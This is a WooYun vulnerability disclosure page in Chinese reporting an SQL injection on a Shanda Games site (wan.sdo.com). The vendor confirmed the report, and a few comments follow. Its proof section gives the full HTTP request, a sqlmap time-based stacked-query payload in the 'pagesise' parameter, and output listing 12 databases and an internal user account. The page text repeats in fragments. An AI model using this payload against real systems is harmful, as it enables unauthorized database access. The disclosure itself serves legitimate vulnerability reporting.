盛大游戏某站点注入12个数据库 | wooyun-2015-0158397| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158397

漏洞标题：盛大游戏某站点注入12个数据库

漏洞作者： Forever80s

提交时间：2015-12-04 22:12

修复时间：2016-01-18 22:50

公开时间：2016-01-18 22:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-04：细节已通知厂商并且等待厂商处理中
2015-12-04：厂商已经确认，细节仅向厂商公开
2015-12-14：细节向核心白帽子及相关领域专家公开
2015-12-24：细节向普通白帽子公开
2016-01-03：细节向实习白帽子公开
2016-01-18：细节向公众公开

简要描述：

详细说明：

漏洞证明：

网站wan.sdo.com  好多重要的数据库如bbs等等 不深入
GET /Read/GetReplyDetail?parentid=9181&replynum=2&pageindex=1&pagesise=5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://wan.sdo.com/read/index/?cid=19&aid=1666
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: wan.sdo.com
Cookie: PHPSESSID=360g2picu82ns1icnlp8thtkb7
Accept-Encoding: gzip, deflate
Parameter: pagesise (GET)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: parentid=9181&replynum=2&pageindex=1&pagesise=5;(SELECT * FROM (SELECT(SLEEP(5)))XKvU)#
    Vector: ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])#
[08:15:00] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.5.7
back-end DBMS: MySQL 5.0.11
available databases [12]:
[*] backup
[*] dis
[*] GameCommunity
[*] GameCommunity_BackTemp
[*] GameCommunity_BBS
[*] GameCommunity_tower
[*] gc_bbs
[*] GC_LB_History
[*] information_schema
[*] mysql
[*] temp_lee
[*] test
current user:    'MallUser@10.158.32.180'

修复方案：

版权声明：转载请注明来源 Forever80s@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-12-04 22:43

厂商回复：

谢谢报告，这个就是社区所以数据库肯定也是bbs，不涉及密码，当然也十分感谢白帽子！！

漏洞评价：

评价

2015-12-05 10:41 | 大师兄 ( 路人 | Rank:29 漏洞数:7 | 每日必关注乌云)

呵
2015-12-05 13:52 | 盛大在线(乌云厂商)

呵
2015-12-05 17:55 | D_in ( 普通白帽子 | Rank:423 漏洞数:65 | 到我嘴里来)

@盛大在线你和盛大游戏是同一个吗
2015-12-05 22:01 | 盛大在线(乌云厂商)

@D_in 是我兄弟
2016-01-10 18:27 | Can ( 实习白帽子 | Rank:40 漏洞数:13 | 个人博客www.webst.cc)

@盛大在线 23333 厉害

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158397

漏洞标题：盛大游戏某站点注入12个数据库

相关厂商：盛大游戏

漏洞作者： Forever80s

提交时间：2015-12-04 22:12

修复时间：2016-01-18 22:50

公开时间：2016-01-18 22:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Forever80s@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158397

漏洞标题：盛大游戏某站点注入12个数据库

相关厂商：盛大游戏

漏洞作者： Forever80s

提交时间：2015-12-04 22:12

修复时间：2016-01-18 22:50

公开时间：2016-01-18 22:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0158397"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Forever80s@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：